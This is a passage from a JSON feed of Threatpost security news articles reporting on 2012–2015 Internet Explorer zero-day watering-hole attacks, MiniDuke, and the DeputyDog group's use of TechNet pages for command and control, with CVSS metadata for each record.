pointers to strings they controlled, he said, enabling them to control system calls without a heap spray.\n\n\u201cI used some new and/or non-public techniques to get a reliable exploit that doesn\u2019t require heap spray, but all in all this bug can be exploited quite reliably,\u201d Vreugdenhil said in a blogpost.\n\nSymantec, meanwhile, yesterday attributed the attacks to the [Elderwood Project](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>), which has been responsible for a number of Microsoft zero days in 2012, including an attack in May against Amnesty International\u2019s Hong Kong site targeting [CVE-2012-1875](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1875>), and several defense-related sites discovered in September to be hosting malware targeting [CVE-2012-4969](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969>). [Symantec then tied the latest IE zero- day to the group](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>) after concluding that the Council of Foreign Relations and Capstone Turbine Corp. websites were hosting the same malicious Shockwave file.\n\n\u201cAll the samples we identified include a function named HeapSpary. HeapSpary is a clear mistyping of Heap Spray, a common attack step used in vulnerability exploitation,\u201d Symantec wrote in a [blogpost](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). \u201cIn addition to this commonality, there are many other symbols in common between the files.\u201d\n\nWatering hole attacks are carried out to monitor the victim\u2019s online activities. Attackers inject malicious files onto websites hoping to snare people with an interest in the site\u2019s focus. These types of attacks are not only effective, but are more economical than targeted attacks that start with a phishing email. Watering hole attacks require less advance legwork, yet are generally state-sponsored, intelligence-driven attacks.\n\nThe compromise of the CFR website, a foreign-policy resource for its notable public figure members and directors, brought the latest zero-day to light. The attack began as early as Dec. 7 and was still going on through the Christmas holiday. Attackers used a malicious Adobe Flash file called today.swf to launch a heap spray attack against IE, overrunning memory and enabling an attacker to remotely execute code on an infected computer. The Javascript hosting the exploit checks first to see if the Windows language is set to English, Chinese, Japanese, Korean or Russian before executing. It also uses cookies to ensure the attack is delivered only once.\n\nThe vulnerability, Microsoft said, occurs in the way IE accesses an object in memory that has been deleted or not properly allocated. Memory may be corrupted and allow an attacker to execute code with the user\u2019s privileges.\n\nResearchers at Avast Software yesterday reported infections on multiple sites worldwide. Researcher Jindrich Kubec said two of the sites were also hosting the binaries and configurations found in the September attacks Symantec tied to Elderwood. Those attacks were serving the PlugX and Poison Ivy RATs.\n", "modified": "2013-05-10T15:44:38", "published": "2013-01-04T18:34:39", "id": "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "href": "https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/77368/", "type": "threatpost", "title": "Researchers Bypass Microsoft Fix It for IE Zero Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:09", "bulletinFamily": "info", "description": "Researchers at Kaspersky Lab and CrySys Lab have discovered files buried inside a MiniDuke command and control server that indicate the presence of a Web-based facet of the campaign that initially targeted government agencies, primarily in Europe.\n\nUsers are likely lured to the malicious webpages via spear phishing messages containing a link to the attack site. The site, which remains active, is serving exploits for patched vulnerabilities in Java and Internet Explorer, researcher Igor Soumenkov wrote on the [Securelist](<http://www.securelist.com/en/blog/208194159/Miniduke_web_based_infection_vector>) blog today.\n\nSoumenkov said the attack site hosts a pair of frames, one that loads a webpage from a legitimate organization involved in the rebuilding and modernization of Iraq. In addition to the decoy page, a malicious page acts as a \u201cprimitive exploit pack,\u201d Soumenkov said, determining the browser used to visit the attack site and then serves the appropriate exploit. Data collected is also sent to the attacker\u2019s server.[](<https://threatpost.com/new-web-based-miniduke-components-discovered-031113/>)\n\n\u201cThe exploits are located in separate webpages,\u201d Soumenkov wrote. \u201cClients using Internet Explorer version 8 are served with about.htm, for other versions of the browser and for any other browser capable of running Java applets, the javascript code loads JavaApplet.html.\u201d\n\nThe Java file loads a Java class file that exploits [CVE-2013-0422](<https://threatpost.com/nasty-new-java-zero-day-found-exploit-kits-already-have-it-011013/>), a vulnerability affecting Java 7u10 and older that bypasses the built-in sandbox in Java to allow remote code execution. Soumenkov said the exploit is coded slightly differently than others exploiting this vulnerability, including the Metasploit module, likely to avoid detection by security software. Oracle patched this vulnerability on Jan. 13; the applet was uploaded on Feb. 11, Soumenkov said.\n\nOnce the Java shellcode is executed, it launches an encrypted DLL and writes it to a temporary Java directory with the name ntuser.bin. It then copies the rundll.32.exe system file to the same directory along with another executable that loads the main module of Miniduke.\n\nMiniduke then reaches out to a pre-seeded Twitter post hosting a URL connecting it to the command and control server to download further instructions.\n\nThe IE 8 exploit behaves similarly, but exploits [CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>), which was [patched in December by Microsoft](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>). A Metasploit module was released Dec. 29 and the [Microsoft Security Update MS13-008](<http://technet.microsoft.com/en-us/security/bulletin/ms13-008>) on Jan. 14. Like its Java counterpart, this exploit page was uploaded Feb. 11.\n\nThe shellcode used in the IE attack downloads a GIF image from the command and control server then decrypts the portable executable file hidden in the image.\n\n\u201cThe PE file also appeared to be a modification of the Miniduke\u2019s main backdoor module that uses the same Twitter URL as the Java payload,\u201d Sumenkov wrote.\n\nMiniDuke surfaced on Feb. 27 and originally were thought to be just a phishing campaign where targets were emailed malicious PDF files pretending to be Ukraine\u2019s foreign policy and NATO membership plans, as well as information for a phony human rights seminar. The PDF attacks targeted CVE-2013-0640, an Adobe Reader vulnerability that had been patched a week earlier. Attackers were able to cope and move files, create new directories, kill processes and install additional malware. MiniDuke was the second successful Reader sandbox bypass.\n\nMiniDuke stood out for researchers for its use of steganography to hide custom backdoor code, as well as using Twitter to reach URLs pointing to command and control servers. Another unique feature of MiniDuke was its use of a small downloader written in an old-school Assembler language used to gather system information unique to the compromised machine.\n\n\u201cThis is a unique and very strange attack. The many different targets hit in separate countries, together with the high profile appearance of the decoy documents and the weird backdoor functionality indicate an unusual threat actor,\u201d said the original Kaspersky and CrySyS report. \u201cSome of the elements remind us of both Duqu and Red October, such as the minimalistic approach, hacked servers, encrypted channels but also the typology of the victims.\u201d\n", "modified": "2013-05-08T14:19:31", "published": "2013-03-11T16:29:10", "id": "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "href": "https://threatpost.com/new-web-based-miniduke-components-discovered-031113/77610/", "type": "threatpost", "title": "New Web-Based MiniDuke Components Discovered", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:40", "bulletinFamily": "info", "description": "This week\u2019s [watering hole attack](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) exploiting a zero-day vulnerability in Internet Explorer was not limited to the influential Council on Foreign Relations site. A Metasploit contributor said an energy manufacturer\u2019s website has been serving malware related to the attack since September.\n\nResearcher [Eric Romang](<http://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/>) said that Capstone Turbine Corp., which builds power generation equipment for utilities, has been infected with malware exploiting [CVE 2012-4969](<http://blogs.technet.com/b/mmpc/archive/2012/09/21/what-you-need-to-know-about-cve-2012-4969.aspx>) for four months and [the latest IE exploit](<http://blogs.technet.com/b/msrc/archive/2012/12/31/fix-it-for-security-advisory-2794220-now-available.aspx>) since Dec. 18.\n\nMeanwhile, a [Metasploit module](<https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012>) has been added to the exploit platform, which could rapidly increase the public availability of exploits.\n\nMicrosoft said it is still working on a security update for the browser vulnerability; as a temporary solution, it released a [Fix-It](<http://support.microsoft.com/kb/2794220>) on Monday night.\n\nWatering hole attacks use drive-bys to target visitors of particular websites; attackers infect the sites with malware that gives the attacker access to the victim\u2019s computer to install more malware or monitor their activities. Watering hole attacks have been used in previous APT-style attacks against Google, large manufacturers and technology companies.\n\nCapstone figures to be a valuable target, Romang said, given its position in the energy community as a producer of microturbine energy products. He found the same malicious html file on the Capstone site as was found residing on the CFR site.\n\nIE 6, 7 and 8 contain the zero-day, a use-after free vulnerability according to AlienVault researcher Jaime Blasco.\n\n\u201cThe exploit is able to exploit both Windows XP and Windows 7 bypassing both data execution (DEP) and address space layout randomization (ASLR) protections,\u201d Blasco wrote in a [blogpost](<http://labs.alienvault.com/labs/index.php/2012/just-another-water-hole-campaign-using-an-internet-explorer-0day/>). DEP and ASLR were implemented in Windows to mitigate memory-based exploits.\n\nThe CFR website has been compromised since early December, Romang said. Attackers used a malicious Adobe Flash file called today.swf to launch a heap spray attack against IE, overrunning memory and enabling an attacker to remotely execute code on an infected computer. The Javascript hosting the exploit checks first to see if the Windows language is set to either English, Chinese, Japanese, Korean or Russian before executing. It also uses cookies to ensure the attack is delivered only once.\n\nThe Council on Foreign Relations is a foreign-policy resource; notable public figures are among its directors and membership. Those government and public officials are the likely targets of the espionage campaign.\n\nMicrosoft insists the impact of the attack is limited since IE 9 and 10 are not vulnerable to the same exploit. Yet it recommends users deploy the Fix It or update their browsers to the latest version. Microsoft\u2019s Jonathan Ness and Cristian Craioveneau wrote in a [blogpost](<http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx>) that the MSHTML appcompat shim modifies the vulnerable function to return NULL.\n\n\u201cBecause the function returns NULL, there is no freed object access the exploit fails to work. This shim may have the side effect in some circumstances of the default form button not being selected by default,\u201d they wrote. \u201cThe shim targets specific mshtml.dll versions so it will deprecate itself when the official update is installed through Windows Update. However, we recommend uninstalling it after it is no longer needed, due to a minor performance impact at application startup.\u201d\n\nThe vulnerability, Microsoft said, occurs in the way IE access an object in memory that has been deleted or not properly allocated. Memory may be corrupted and allow an attacker to execute code with the user\u2019s privileges.\n", "modified": "2013-05-10T15:56:18", "published": "2013-01-02T21:41:29", "id": "THREATPOST:0F39C75CE601A68EFCAA9B0C7713E32B", "href": "https://threatpost.com/energy-manufacturer-also-victimized-ie-zero-day-watering-hole-attack-010213/77359/", "type": "threatpost", "title": "Energy Manufacturer Also Victimized by IE Zero Day in Watering Hole Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:12", "bulletinFamily": "info", "description": "As expected, Microsoft today released a cumulative update for Internet Explorer addressing the zero-day vulnerability in the browser being actively exploited in the wild. [Security Update MS 12-063](<http://technet.microsoft.com/en-us/security/bulletin/ms12-063>) patches not only the critical remote-execution zero-day, but four other vulnerabilities privately disclosed to Microsoft that are not being exploited.\n\nThe most critical vulnerability is the [execCommand Use After Free flaw in IE versions 6-9](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969>). The vulnerability occurs because of a faulty way in which IE access objects in memory that have not been deleted or properly allocated. Successful exploits will give the attacker the same privileges as the user.\n\nExploits were discovered this week by a pair of research teams. Eric Romang, a Metasploit contributor, found the first last weekend while monitoring servers infected by a pair of recent Java zero-day exploits. Romang found a pair of HTML pages, an executable and a Flash movie file that triggers the executable when a user lands on one of the malicious HTML pages. The first exploit dropped the PoisonIvy remote access Trojan.\n\nRomang and several other researchers collaborated on a Metasploit exploit module that was made available on Monday.\n\nA few days later, researcher Jamie Blasco at AlienVault found three more exploits, including one that dropped the[ PlugX RAT](<https://threatpost.com/researcher-finds-three-new-exploits-targeting-latest-ie-zero-day-091812/>). All of these exploits are tied to[ Nitro, a hacker group in China](<https://threatpost.com/latest-ie-zero-day-flaw-tied-nitro-hackers-and-recent-java-zero-day-exploits-091712/>). The three latest exploits all target defense contractors in either the United States or India. Blasco had evidence within his research that these three exploits were built before the release of the Metasploit module and was able to tie them to Nitro because he found files named after a video game character from Warlock: Master of the Arcane; other files tied to previously tied to Nitro were similarly named.\n\nMicrosoft responded in stages throughout the week, first recommending several workarounds, before making a [FixIt solution](<https://threatpost.com/microsoft-will-patch-ie-zero-day-friday-fixit-available-stopgap-092012/>) available that would temporarily mitigate the vulnerability until today\u2019s patch was available. Microsoft announced it would release today\u2019s patch late Wednesday night.\n", "modified": "2013-04-17T16:31:30", "published": "2012-09-21T17:38:20", "id": "THREATPOST:F8901D712353053F8617BC6F33688637", "href": "https://threatpost.com/microsoft-releases-out-band-ie-zero-day-patch-092112/77037/", "type": "threatpost", "title": "Microsoft Releases Out-Of-Band IE Zero-Day Patch", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:51", "bulletinFamily": "info", "description": "The United States Department of Labor website is the latest high-profile government site to fall victim to a watering hole attack. Researchers at a number of security companies reported today that the site was hosting malware and redirecting visitors to a site hosting the Poison Ivy remote access Trojan.\n\nThe malware has since been removed and law enforcement is investigating.\n\nThe attackers inserted javascript onto the DoL\u2019s Site Exposure Matrices (SEM) website that sent visitors to another site hosting an exploit for [CVE 2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) targeting Windows XP users running Internet Explorer versions 6-8. The vulnerability, a user-after free memory vulnerability in the browser, enables attackers to remotely run code on a compromised machine. This has been exploited in the wild since December and was [patched earlier this year by Microsoft](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>).\n\n\u201cThis profile fits the enterprise user machine profile typical of large enterprise and government agencies,\u201d said Invincea founder and CEO Anup Ghosh.\n\nThe DoL\u2019s SEM site is a repository of data on toxic substances present at facilities run by the Department of Energy.\n\nThe malware drops an executable called conime[.]exe onto the infected computer and opens remote connections on ports 443 and 53, Invincea said, adding there were two redirects present on the DoL page sending visitors to dol[.]ns01[.]us. Once the user is redirected, a file is executed, ports are opened and registry changes are made to maintain persistence on the machine. Ghosh said that one of the command and control servers had already been blacklisted by Google.\n\nAlien Vault Lab manager Jaime Blasco said the attacker also collects a bit of system information including whether a number of antivirus programs, Flash, Java, and Microsoft Office are running, and sends that data to the remote server. Blasco added that the command and control protocol used in the attack matches that of a Chinese espionage gang known as DeepPanda; other characteristics of this attack match those used against a Thai human rights nongovernment organization website.\n\n[Watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/>) have been used primarily by state-sponsored attackers to spy on rival governments, dissident citizen groups and manufacturing organizations. Rather than rely on spear phishing, attackers infect websites of common interest to their targets, generally with javascript via an iframe that redirects the victim to a site hosting espionage malware. Some high-profile watering hole attacks have been carried out this year against the [Council on Foreign Relations website](<http://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) and a [popular iOS mobile developer forum](<http://threatpost.com/ios-developer-site-core-facebook-apple-watering-hole-attack-022013/>) that snared a number of victims at Facebook, Apple and Twitter.\n\nIn this case, it\u2019s likely the targets were Department of Labor employees and other federal employees tied to the DoL and Department of Energy.\n\n\u201cIt is important to note that most websites are vulnerable to exploit. As a result, exploiting legitimate websites have become a common vector for penetrating enterprise networks and individual machines,\u201d Ghosh said. \u201cThe Department of Labor is no exception.\u201d\n", "modified": "2013-07-02T18:18:20", "published": "2013-05-01T16:30:58", "id": "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", "href": "https://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/100081/", "type": "threatpost", "title": "Watering Hole Attack Hits US Department of Labor Website", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "bulletinFamily": "info", "description": "Internet Explorer users, exposed to a zero-day vulnerability in the browser and a faulty temporary Fix It from Microsoft, finally got some relief today when the company, as promised, released an out-of-band patch.\n\nMeanwhile, a handful of new telco, manufacturing and human rights sites have been infected and have been serving exploits since the public release of the zero-day, a researcher told Threatpost.\n\nThe [IE security update](<http://technet.microsoft.com/en-us/security/bulletin/ms13-008>) repairs previously unreported flaws in IE 6-8 exploited in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) against government and manufacturing websites worldwide.\n\nExploits were active against IE 8 only, but previous versions also contained the same use-after free vulnerability. Sites visited by high-value targets were compromised and serving exploits via drive-by download attacks. An attacker would then gain the same privileges as a user and be able to execute code remotely on a vulnerable computer.\n\nThe vulnerability was reported shortly after Christmas Day when it was discovered that the Council on Foreign Relations website had been compromised and serving malware for close to a month. Soon thereafter, Capstone Turbine Co., a power equipment manufacturer for utilities, was also serving malware as were [political, social and human rights websites in Russia, China and Hong Kong](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>).\n\nResearcher Eric Romang said that since, he has seen more sites hosting exploits including an Australian telco provider, a US service provider and a US importer of used Japanese auto parts.\n\n\u201cAfter the public release of the zero day, two different variants of the zero day have been found exploited in targeted attacks against human rights activists, a Japanese tourism agency and a Taiwan petrochemical company,\u201d Romang said.\n\n[CVE-2012-4792](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) is a memory corruption issue in IE that occurs when the browser accesses an object in memory that has not been initialized or has been deleted, it may corrupt memory and the attacker would have control of the machine.\n\nThe CFR attack cast the first attention on the zero day, which Romang said began as early as Dec. 7. Symantec has linked these attacks to the [Elderwood group](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>), the same group said to be behind the 2009 Aurora attacks on Google. Attackers planted a malicious Adobe Flash file on the CFR site which kicked off a heap spray attack against IE, exploiting the vulnerability. The Javascript would check the Windows language first, and if sent to English, Chinese, Japanese, Korean, or Russia, would execute. It also checked cookies in order to deliver the attack only once.\n\nMicrosoft was quick to offer temporary workarounds and mitigations, including a Fix It. The stop-gap was short-lived, however, as security company Exodus Intelligence reported Jan. 4 it had [bypassed the Fix It](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). Exodus VP of Intelligence Brandon Edwards told Threatpost did cover paths used by the known exploits, but not all the ways the vulnerability could be reached.\n\nA source said Microsoft was able to take the details provided by Exodus and confirm the Fix It could be bypassed; Exodus did not provide full source code for its proof of concept to Microsoft, it only does so for its customers.\n\nPast watering hole attacks have been linked to nation states, including China. They are intelligence-driven and target sites frequented by influential people\u2014the real targets of the attacks. Attackers inject malicious files onto websites hoping to snare people with an interest in the site\u2019s focus. These types of attacks are not only effective, but are more economical than targeted attacks that start with a phishing email.\n\nMicrosoft continues to call the impact of the attacks limited. IE 8 installations, meanwhile, account for the majority of enterprise market share, followed by IE 7 and 6. IE 9 and 10 are not vulnerable, Microsoft said.\n\nIn the meantime, users are urged to apply the IE patch immediately.\n\n\u201cPlease note that this update is a real patch and not a cumulative update as we are used to for typical Internet Explorer updates,\u201d said Wolfgang Kandek, CTO at Qualys. \u201cIt is highly recommended to have [MS12-077, the last cumulative Internet Explorer update](<http://technet.microsoft.com/en-us/security/bulletin/ms12-077>), installed before applying MS13-008.\u201d\n", "modified": "2013-05-10T14:29:20", "published": "2013-01-14T20:29:58", "id": "THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "href": "https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403/", "type": "threatpost", "title": "Out-of-Band IE Patch Released as More Sites Attacked", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:52", "bulletinFamily": "info", "description": "The so-called [Deputy Dog APT group](<https://threatpost.com/compromised-japanese-media-sites-serving-exploits-for-latest-ie-zero-day/102384>) has surfaced again with a means of keeping its command and control servers under wraps that involves Microsoft\u2019s TechNet online resources.\n\nNew [research](<https://www.fireeye.com/blog/threat-research/2015/05/hiding_in_plain_sigh.html>) published last week by Microsoft and FireEye revealed targeted attacks against organizations have been discovered in which Chinese attackers have created phony profiles on the Microsoft-owned IT resource where the attackers are embedding encoded command and control information used by a variant of the BlackCoffee remote access Trojan.\n\nThe use of TechNet is a formidable evasion technique since most signature-based defenses wouldn\u2019t consider such a widely used resource a threat.\n\nIn conjunction with the discovery, researchers at RSA Security today released to the public a Python script that [decodes the embedded values](<https://blogs.rsa.com/wolves-among-us-abusing-trusted-providers-malware-operations/>) on a TechNet page and reveals command and control information.\n\nRSA researchers Brian Baskin and Jared Myers said the malware, which they call PNGRAT, was found on two customer networks. They explain that the malware contains a hardcoded URL to the attacker-created TechNet profile page. The malicious code connects to TechNet, decodes the message buried in a string between the characters @MICRO0S0FT and C0RP0RATI0N. Doing so reveals an IP address where further command and control connections await, RSA said.\n\n\u201cIt\u2019s not an overly complicated encoding scheme; looking at the malware, it took us about 15 minutes to figure out the encoding,\u201d Myers said. \u201cIt uses two characters for every octet of the IP address. It does simple math on each character, adds it up and it ends up resolving the value, which is one octet of the IP address.\u201d\n\nThe PNGRAT variant, RSA said, contains a bit of additional functionality, including some features generally confined to crimeware rather than malware used in targeted attacks. The use of TechNet to store command and control information is a time-tested tactic from attackers as they continue to focus on evading detection and keep C&amp;C servers up and running for longer periods of time.\n\n\u201cThat\u2019s the problem with this aspect of the attack; TechNet is popular and would not be blocked,\u201d Baskin said. \u201cWe\u2019ve seen that same style of attack used before with Gmail and other public websites. Tomorrow, or the week after, or the month after, they could be using this same routine on an Amazon page or any other trusted website out there.\u201d\n\nFireEye\u2019s attributes the attack to [DeputyDog,](<https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html>) which is also known as APT17, which has used the BlackCoffee malware for two years. Its targets in the past have included government agencies, international law enforcement firms and technology companies. DeputyDog hit media targets in Japan in late 2013 with a rash of malware exploiting a zero-day vulnerability in Internet Explorer. Exploits were disguised as image files and once they were executed, connected to command and control servers and sent stolen data back to the attackers.\n\nRSA refused to provide any details on the two compromised organizations it investigated.\n\n\u201cI would say [the attackers\u2019] mission somewhat successful,\u201d Baskin said. \u201cThey were not in the environment as long as they wanted to be, but they were able to get data out.\u201d\n", "modified": "2015-05-26T12:00:03", "published": "2015-05-18T15:03:16", "id": "THREATPOST:1699EFD514DA7A82DC9285D3892F61AE", "href": "https://threatpost.com/apt-group-embeds-command-and-control-data-on-technet-pages/112881/", "type": "threatpost", "title": "APT Group Embeds C&C Data on TechNet Pages", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "bulletinFamily": "info", "description": "Another malicious website has been discovered hosting an exploit for the [zero-day vulnerability Internet Explorer patched by Microsoft](<https://threatpost.com/microsoft-releases-out-band-ie-zero-day-patch-092112/>) last week. This site, like the other exploits discovered, targets the defense and space industries, and is dropping an unknown payload, according to Barracuda Labs. [Researcher Dave Michmerhuizen](<https://www.barracudanetworks.com/blogs/labsblog?bid=3101>) said the compromised site is not likely a drive-by attack, but instead may be included in phishing email messages to specific individuals within those respective industries.\n\n\u201cWhat makes this vulnerability so serious is that just one click on a link in such an email is all it takes to completely carry out the exploit,\u201d Michmerhuizen wrote in a blogpost.\n\nThe site shows a WebEx meeting interface with a \u201cMeeting Canceled\u201d notice splashed on the page. Under the hood, two HTML pages are loaded into invisible iframe elements. One triggers the use-after-free vulnerability that bypasses Windows\u2019 built-in ASLR protections with additional commands that will download and execute the malicious payload.\n\nThe second HTML file sets up and triggers the exploit if the user is running IE.\n\n\u201cThe exploit triggers automatically and the result is the download and execution of a backdoor which gives the attacker full access to the computer, and, if they\u2019re lucky, the organizational network that the computer is on,\u201d Michmerhuizen wrote.\n\nPrevious exploits were dropping either the [Poison Ivy](<https://threatpost.com/poison-ivy-rat-still-giving-users-rash-110311/>) or PlugX remote access Trojans. This malicious file discovered by Barracuda has a similar file name to the others, Grumgog.swf, named after a character in a video game. Barracuda did not identify the payload dropped here, but did call it a backdoor.\n\n\u201cThe exploit is being used in a very targeted way, spear-phishing certain industries and installing remote backdoors,\u201d a Barracuda spokesperson said. \u201cThe concern is that it could be replicated easily by people who sell the [Black Hole exploit kit](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/>) \u2013 and expose a much larger number of people.\u201d \n\nThe vulnerability was discovered more than a week ago by researcher and Metasploit contributor Eric Romang, while monitoring infected servers hosting exploits for a pair of Java zero-day vulnerabilities discovered in August. Romang found similar HTML pages and a malicious Flash movie file serving up the Poison Ivy RAT.\n\nHe contributed to a Metasploit exploit module that was released on Monday. One day later, researchers at AlienVault discovered three more exploits targeting defense industry-related sites in the United States and India. These were dropping the PlugX RAT. All of the exploit activity is being attributed to Nitro, a group of hackers in China.\n\nThis activity prompted Microsoft to first issue recommended workarounds, followed by a FixIt solution that would temporarily mitigate the vulnerability until it released an [out-of-band patch](<http://technet.microsoft.com/en-us/security/bulletin/ms12-063>) on Friday.\n\nThe vulnerability is the [execCommand Use After Free flaw in IE versions 6-9](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969>). The vulnerability occurs because of a faulty way in which IE access objects in memory that have not been deleted or properly allocated. Successful exploits will give the attacker the same privileges as the user.\n", "modified": "2013-04-17T16:31:29", "published": "2012-09-24T17:27:15", "id": "THREATPOST:315D1B272F5920E57478E9A5E27C5EFC", "href": "https://threatpost.com/another-ie-exploit-targeting-defense-industry-discovered-092412/77041/", "type": "threatpost", "title": "Another IE Exploit Targeting Defense Industry Discovered", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:39", "bulletinFamily": "info", "description": "The scope of [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) utilizing a [previously unreported vulnerability in Internet Explorer](<https://threatpost.com/microsoft-responds-ie-zero-day-used-cfr-watering-hole-attack-123112/>) has widened to as many as four new sites, all of them with politically charged leanings.\n\nThe attacks further demonstrate the effectiveness of watering hole attacks compared to phishing attacks for example, which require some advance legwork in order to target victims.\n\n\u201cThe whole point of the waterhole tactic is that they believe such sites, although usually not with high numbers of users, will have interesting visitors,\u201d said Jindrich Kubec, a researcher with Avast Software in the Czech Republic. \u201cMaybe [the attackers] believe that this may be less guarded in an enterprise environment. This only needs passive visitors of the website.\u201d\n\nKubec said two Chinese human rights sites, a Hong Kong newspaper site and a Russian science site are infected with the Flash exploit of IE8. Luxembourg-based researcher and Metasploit contributor Eric Romang identified one of the Chinese sites as the home of the dissident Uygur Haber Ajanski group. [Romang said the site is still hosting the exploit](<http://eromang.zataz.com/2013/01/03/chinese-uygur-minority-also-targeted-in-the-cfr-watering-hole-attack-and-more/>) and urges users to stay away.\n\nRomang also said a Taiwanese travel agency Phil-Am Tour, was also hosting the same infected file, but has since been cleaned.\n\nInitial reports of the attack came earlier this week when an attack against the influential Washington, D.C.-based Council on Foreign Relations website was discovered. A malicious Adobe Flash. swf file was discovered on the site and infecting visitors using Internet Explorer 8. IE 6 and 7 also contain the same use-after free memory corruption vulnerability, but the exploit targeted IE 8 users only.\n\nThe CFR is a foreign-policy resource and numerous public, political figures are listed among its members and directors. Yesterday[, Romang also identified Capstone Turbine Corp](<https://threatpost.com/energy-manufacturer-also-victimized-ie-zero-day-watering-hole-attack-010213/>)., an energy microturbine manufacturer as also hosting the exploit on its website. Capstone\u2019s equipment is present in many prominent en energy utilities.\n\nAvast, meanwhile, said two of the infected sites are hosting the same binary with the same configuration, which also matches an [attack reported in September against a separate IE zero-day](<https://threatpost.com/researcher-finds-three-new-exploits-targeting-latest-ie-zero-day-091812/>) that was attributed to the Nitro gang in China. Those attacks were serving the PlugX and Poison Ivy remote access Trojans. Kubec said Avast\u2019s CommunityIQ threat service reported detections on Dec. 9 on the new sites.\n\n\u201cAt least two of the sites use the same spyware binary with exactly same configuration,\u201d Kubec told Threatpost. \u201cThe rest look a bit different, but we haven\u2019t investigated it thoroughly yet.\u201d\n\nMicrosoft, meanwhile, insists the scope of the attacks are limited because most of its users are on IE9 and IE10 and have moved off the older versions of the browser; [Microsoft said it will not have an IE update ready for Tuesday\u2019s upcoming Patch Tuesday security updates](<https://threatpost.com/patch-ie-zero-day-wont-be-among-microsoft-security-updates-next-week-010313/>). A [Fix It](<http://support.microsoft.com/kb/2794220>) was released Monday as a temporary mitigation. Kubec said that 33 percent of Avast\u2019s CommunityIQ users are on Internet Explorer, and 50 percent of them are on IE8 or older.\n\n\u201cOne of the reasons for high IE8 numbers may be Microsoft\u2019s decision not to put IE9 to [Windows] XP,\u201d Kubec said.\n\nThe CFR compromise brought these attacks to light. Attackers used a malicious Adobe Flash file called today.swf to launch a heap spray attack against IE, overrunning memory and enabling an attacker to remotely execute code on an infected computer. The Javascript hosting the exploit checks first to see if the Windows language is set to either English, Chinese, Japanese, Korean or Russian before executing. It also uses cookies to ensure the attack is delivered only once.\n\nThe vulnerability, Microsoft said, occurs in the way IE access an object in memory that has been deleted or not properly allocated. Memory may be corrupted and allow an attacker to execute code with the user\u2019s privileges.\n", "modified": "2013-05-10T15:49:54", "published": "2013-01-03T22:02:04", "id": "THREATPOST:4E6C8CF00D7C082D8B3A4314BBFD35A6", "href": "https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/77364/", "type": "threatpost", "title": "IE Zero-Day Watering Hole Attack Expands to Handful of Political Sites", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:08", 